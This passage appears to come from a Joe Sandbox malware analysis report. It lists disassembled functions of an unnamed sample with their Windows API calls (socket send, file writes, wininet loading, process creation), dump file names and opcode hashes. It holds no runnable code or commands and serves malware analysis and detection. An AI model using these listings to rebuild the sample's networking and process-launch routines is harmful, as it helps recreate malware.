                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773E50
                                                                                                                                                                      • send.WS2_32(?,000000FF,00000000,00000000), ref: 03773E6E
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 03773E81
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03773E94
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773EBC
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773EC7
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773EDB
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03773F14
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 03773F51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1701177279-0
                                                                                                                                                                      • Opcode ID: bd9f497e35fdb08f243ab884ddc11d723b95def739f9a8ccdb67c636ff8675d4
                                                                                                                                                                      • Instruction ID: f8c1b8552be6f9cffef6f30cc4c9149bb894472849f9d767df362cb87c0a6a05
                                                                                                                                                                      • Opcode Fuzzy Hash: bd9f497e35fdb08f243ab884ddc11d723b95def739f9a8ccdb67c636ff8675d4
                                                                                                                                                                      • Instruction Fuzzy Hash: B44149751047059FDB24EF78D8C8AA7B7F8FB08300F44896EE86ECB245D775A4029B90
                                                                                                                                                                      Function 03774F30 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03774F63
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03774F78
                                                                                                                                                                      • WSASetLastError.WS2_32(00002746), ref: 03774F8A
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 03774F91
                                                                                                                                                                      • timeGetTime.WINMM ref: 03774FBF
                                                                                                                                                                      • timeGetTime.WINMM ref: 03774FE7
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03775025
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03775031
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 03775038
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 0377504B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1979691958-0
                                                                                                                                                                      • Opcode ID: f43bc1a0b5852291077e9628a0c106984f65d28b52f05a7a9260e758de90d656
                                                                                                                                                                      • Instruction ID: b698c98cd980d183bdd15ddf7659a98c72bfab5cbb37a1a7e4d395ff340de49b
                                                                                                                                                                      • Opcode Fuzzy Hash: f43bc1a0b5852291077e9628a0c106984f65d28b52f05a7a9260e758de90d656
                                                                                                                                                                      • Instruction Fuzzy Hash: 50410631600708EFDF20EF39D548A6AB7E9FB49314F0C8A9AE44ACB641E735E456CB41
                                                                                                                                                                      Function 02C64F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02C64F43
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02C64F58
                                                                                                                                                                      • WSASetLastError.WS2_32(00002746), ref: 02C64F6A
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C64F71
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C64F9F
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C64FC7
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C65005
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02C65011
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C65018
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C6502B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1979691958-0
                                                                                                                                                                      • Opcode ID: 54df8fb2742aedd45c02bbc7320fe32c82dfb850ce4f800534d9ff3994d2affd
                                                                                                                                                                      • Instruction ID: a73b17a46a8bdba3e65e8de7151ca8f364e310473726ba5ccbb25923172c24e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 54df8fb2742aedd45c02bbc7320fe32c82dfb850ce4f800534d9ff3994d2affd
                                                                                                                                                                      • Instruction Fuzzy Hash: 8941D531A002009FD730DF69D98CB7AB7E6FF88354F508A59E84ACB241E776E5548B82
                                                                                                                                                                      Function 0377C270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377C2AE
                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0377C2CC
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0377C309
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377C314
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0377C321
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377C345
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                                                                                      • String ID: %s %s
                                                                                                                                                                      • API String ID: 1326869720-2939940506
                                                                                                                                                                      • Opcode ID: 1edfad6cb6980bb812b8415ce50bb1781718b5f0181fc6d386fcf7add2012a74
                                                                                                                                                                      • Instruction ID: 30924a013cc7d14aaf2ecf0bd1f5d05496311e2d5aad27974619caee818e8242
                                                                                                                                                                      • Opcode Fuzzy Hash: 1edfad6cb6980bb812b8415ce50bb1781718b5f0181fc6d386fcf7add2012a74
                                                                                                                                                                      • Instruction Fuzzy Hash: F731D53264021C7BDF24EB64DC85FEF737CEB09311F40469AF605AA181DA345A44CFA1
                                                                                                                                                                      Function 0377C980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88processstringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0377C98D
                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 0377C9C7
                                                                                                                                                                        • Part of subcall function 03777C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03777CC3
                                                                                                                                                                        • Part of subcall function 03777C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03777CD7
                                                                                                                                                                        • Part of subcall function 03777C80: FreeLibrary.KERNEL32(00000000), ref: 03777CF7
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(-00000002), ref: 0377C9E6
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0377C9F1
                                                                                                                                                                      • _memset.LIBCMT ref: 0377CA04
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0377CA31
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                                                                                      • String ID: D$WinSta0\Default
                                                                                                                                                                      • API String ID: 174883095-1101385590
                                                                                                                                                                      • Opcode ID: 1f3e062cc4cc0a622145dc52eb2178ba836171cb8b53690e603e7fd45e8592c8
                                                                                                                                                                      • Instruction ID: e0c61b41fd1859f246912474d7d47f200d126b95a76a3295b563c33af5848ed7
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f3e062cc4cc0a622145dc52eb2178ba836171cb8b53690e603e7fd45e8592c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 16112EB7A0020837DB25F7A85C89FBFB76CDB55610F044136FA059D284E6359505C2E1
                                                                                                                                                                      Function 03778159 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,A:\), ref: 03778166
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,B:\), ref: 03778176
                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037781A6
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 037781B7
                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 037781CE
                                                                                                                                                                      • lstrcpyW.KERNEL32(00000AD4,?), ref: 03778204
                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 03778228
                                                                                                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 03778233
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                                                                                      • String ID: A:\$B:\
                                                                                                                                                                      • API String ID: 4249875308-1009255891
                                                                                                                                                                      • Opcode ID: a4d3b7addff0e21be439a98b1e51a88fa4d0aea0ebeb8161d0571d5bd86ebbff
                                                                                                                                                                      • Instruction ID: c6c9794a368870fa172906081167c8d72a6aaea9c8a0c1c1509692345034b25e
                                                                                                                                                                      • Opcode Fuzzy Hash: a4d3b7addff0e21be439a98b1e51a88fa4d0aea0ebeb8161d0571d5bd86ebbff
                                                                                                                                                                      • Instruction Fuzzy Hash: E7118171A01218EBDF20EF60DD497EEB378EF44310F044599DE09A7240E774DA06CBA5
                                                                                                                                                                      Function 03779730 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,A0516FA3,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E,00000000), ref: 03779773
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0377E1AE,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779812
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779850
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779875
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 0377989A
                                                                                                                                                                        • Part of subcall function 03771280: __CxxThrowException@8.LIBCMT ref: 03771290
                                                                                                                                                                        • Part of subcall function 03771280: DeleteCriticalSection.KERNEL32(00000000,0377D3E6,03796624,?,?,0377D3E6,?,?,?,?,03795A40,00000000), ref: 037712A1
                                                                                                                                                                        • Part of subcall function 0377CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0377E076,00000000,A0516FA3,0377E04E,74DF2F60,00000000,?,0377E226,0379110B,000000FF,?,0377994A,0377E226), ref: 0377CE67
                                                                                                                                                                        • Part of subcall function 0377CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0377E08E,00000000,?,0377E226,0379110B,000000FF,?,0377994A,0377E226,?,?,?,00000000,0379125B,000000FF), ref: 0377CE83
                                                                                                                                                                      • InterlockedExchange.KERNEL32(0377E066,00000000), ref: 037799A0
                                                                                                                                                                      • timeGetTime.WINMM(?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 037799A6
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 037799B4
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 037799BD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1400036169-0
                                                                                                                                                                      • Opcode ID: b513480101fa7e88a4a2ad05c6f9f13d91acab1c86e955512cf6aa3d250616d9
                                                                                                                                                                      • Instruction ID: ad0b3068c210039a0a8096a6b0716244767e46fe84bc5a53ffd749e749fa74f2
                                                                                                                                                                      • Opcode Fuzzy Hash: b513480101fa7e88a4a2ad05c6f9f13d91acab1c86e955512cf6aa3d250616d9
                                                                                                                                                                      • Instruction Fuzzy Hash: FD81C5B0A01A46BFE744DF7AC88479AFBA8FB09314F50862ED12CD7640D775A964CF90
                                                                                                                                                                      Function 03773500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03773660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03773667
                                                                                                                                                                        • Part of subcall function 03773660: _free.LIBCMT ref: 0377369C
                                                                                                                                                                        • Part of subcall function 03773660: _malloc.LIBCMT ref: 037736D7
                                                                                                                                                                        • Part of subcall function 03773660: _memset.LIBCMT ref: 037736E5
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(037A1F0C), ref: 03773565
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(037A1F0C), ref: 03773573
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0377359A
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 037735B3
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,?,037A1F0C), ref: 037735EE
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 03773621
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03773639
                                                                                                                                                                        • Part of subcall function 03773F60: GetCurrentThreadId.KERNEL32 ref: 03773F65
                                                                                                                                                                        • Part of subcall function 03773F60: send.WS2_32(?,037949C0,00000010,00000000), ref: 03773FC6
                                                                                                                                                                        • Part of subcall function 03773F60: SetEvent.KERNEL32(?), ref: 03773FE9
                                                                                                                                                                        • Part of subcall function 03773F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03773FF5
                                                                                                                                                                        • Part of subcall function 03773F60: WSACloseEvent.WS2_32(?), ref: 03774003
                                                                                                                                                                        • Part of subcall function 03773F60: shutdown.WS2_32(?,00000001), ref: 0377401B
                                                                                                                                                                        • Part of subcall function 03773F60: closesocket.WS2_32(?), ref: 03774025
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 03773649
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 127459856-0
                                                                                                                                                                      • Opcode ID: 97cafa48633974060d49b5bdc28e344d0917141cabcaeb8430da46ab5f3aa0d2
                                                                                                                                                                      • Instruction ID: 6dd1bac515bf97f548fd6cc6007228d55fb3d9c579bec284db93e6cebca262c1
                                                                                                                                                                      • Opcode Fuzzy Hash: 97cafa48633974060d49b5bdc28e344d0917141cabcaeb8430da46ab5f3aa0d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8441A0B9600704AFE760EF79DC81B6AF7E8FB48701F50492EE64AD7680D7B5E4049B90
                                                                                                                                                                      Function 02C63500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C63660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C63667
                                                                                                                                                                        • Part of subcall function 02C63660: _free.LIBCMT ref: 02C6369C
                                                                                                                                                                        • Part of subcall function 02C63660: _malloc.LIBCMT ref: 02C636D7
                                                                                                                                                                        • Part of subcall function 02C63660: _memset.LIBCMT ref: 02C636E5
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02C7D990), ref: 02C63565
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02C7D990), ref: 02C63573
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02C6359A
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02C635B3
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,?,02C7D990), ref: 02C635EE
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 02C63621
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 02C63639
                                                                                                                                                                        • Part of subcall function 02C63F60: GetCurrentThreadId.KERNEL32 ref: 02C63F65
                                                                                                                                                                        • Part of subcall function 02C63F60: send.WS2_32(?,02C77440,00000010,00000000), ref: 02C63FC6
                                                                                                                                                                        • Part of subcall function 02C63F60: SetEvent.KERNEL32(?), ref: 02C63FE9
                                                                                                                                                                        • Part of subcall function 02C63F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C63FF5
                                                                                                                                                                        • Part of subcall function 02C63F60: WSACloseEvent.WS2_32(?), ref: 02C64003
                                                                                                                                                                        • Part of subcall function 02C63F60: shutdown.WS2_32(?,00000001), ref: 02C6401B
                                                                                                                                                                        • Part of subcall function 02C63F60: closesocket.WS2_32(?), ref: 02C64025
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 02C63649
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 127459856-0
                                                                                                                                                                      • Opcode ID: 602a04fa532578dc6978bced49faf2781c71eb5ad812b4d98276df7cafcab284
                                                                                                                                                                      • Instruction ID: 48087ae806f2e2029aa5a3243c884b19516c258f00d9a31bc314ca05eb2de986
                                                                                                                                                                      • Opcode Fuzzy Hash: 602a04fa532578dc6978bced49faf2781c71eb5ad812b4d98276df7cafcab284
                                                                                                                                                                      • Instruction Fuzzy Hash: B241AEB1A40704AFD360EF69DCC5B6AB7E9FF88701F50096EEA46D7680D7B1E5048B90
                                                                                                                                                                      Function 03774430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 03774443
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 0377444C
                                                                                                                                                                      • timeGetTime.WINMM ref: 0377444E
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 0377445D
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00001770), ref: 037744AB
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 037744C8
                                                                                                                                                                        • Part of subcall function 03773F60: GetCurrentThreadId.KERNEL32 ref: 03773F65
                                                                                                                                                                        • Part of subcall function 03773F60: send.WS2_32(?,037949C0,00000010,00000000), ref: 03773FC6
                                                                                                                                                                        • Part of subcall function 03773F60: SetEvent.KERNEL32(?), ref: 03773FE9
                                                                                                                                                                        • Part of subcall function 03773F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03773FF5
                                                                                                                                                                        • Part of subcall function 03773F60: WSACloseEvent.WS2_32(?), ref: 03774003
                                                                                                                                                                        • Part of subcall function 03773F60: shutdown.WS2_32(?,00000001), ref: 0377401B
                                                                                                                                                                        • Part of subcall function 03773F60: closesocket.WS2_32(?), ref: 03774025
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 037744DC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 542259498-0
                                                                                                                                                                      • Opcode ID: b9348ae89a763ba452ed1707b181963f1e4d6b49d22d742a8c0e7c0048def601
                                                                                                                                                                      • Instruction ID: 0b57c501933872a45acdb0bfdb0060068adc21f3557074ed2a17d7ee4f98004b
                                                                                                                                                                      • Opcode Fuzzy Hash: b9348ae89a763ba452ed1707b181963f1e4d6b49d22d742a8c0e7c0048def601
                                                                                                                                                                      • Instruction Fuzzy Hash: D6216F76640708ABC630EF79EC85A97B3E8EF89710F104A1EE68AC7640D671E405DBA5
                                                                                                                                                                      Function 02C64430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C64443
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C6444C
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C6444E
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C6445D
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00001770), ref: 02C644AB
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C644C8
                                                                                                                                                                        • Part of subcall function 02C63F60: GetCurrentThreadId.KERNEL32 ref: 02C63F65
                                                                                                                                                                        • Part of subcall function 02C63F60: send.WS2_32(?,02C77440,00000010,00000000), ref: 02C63FC6
                                                                                                                                                                        • Part of subcall function 02C63F60: SetEvent.KERNEL32(?), ref: 02C63FE9
                                                                                                                                                                        • Part of subcall function 02C63F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C63FF5
                                                                                                                                                                        • Part of subcall function 02C63F60: WSACloseEvent.WS2_32(?), ref: 02C64003
                                                                                                                                                                        • Part of subcall function 02C63F60: shutdown.WS2_32(?,00000001), ref: 02C6401B
                                                                                                                                                                        • Part of subcall function 02C63F60: closesocket.WS2_32(?), ref: 02C64025
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C644DC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 542259498-0
                                                                                                                                                                      • Opcode ID: df3f04ee29f7b66d069727e3f58d69b8f1a7dad2c02f68e0f2a1986d9bfece49
                                                                                                                                                                      • Instruction ID: b922b56e2dfb10fd26552ee200610fd39e34a909cbcdf1f39715125bc1444f5b
                                                                                                                                                                      • Opcode Fuzzy Hash: df3f04ee29f7b66d069727e3f58d69b8f1a7dad2c02f68e0f2a1986d9bfece49
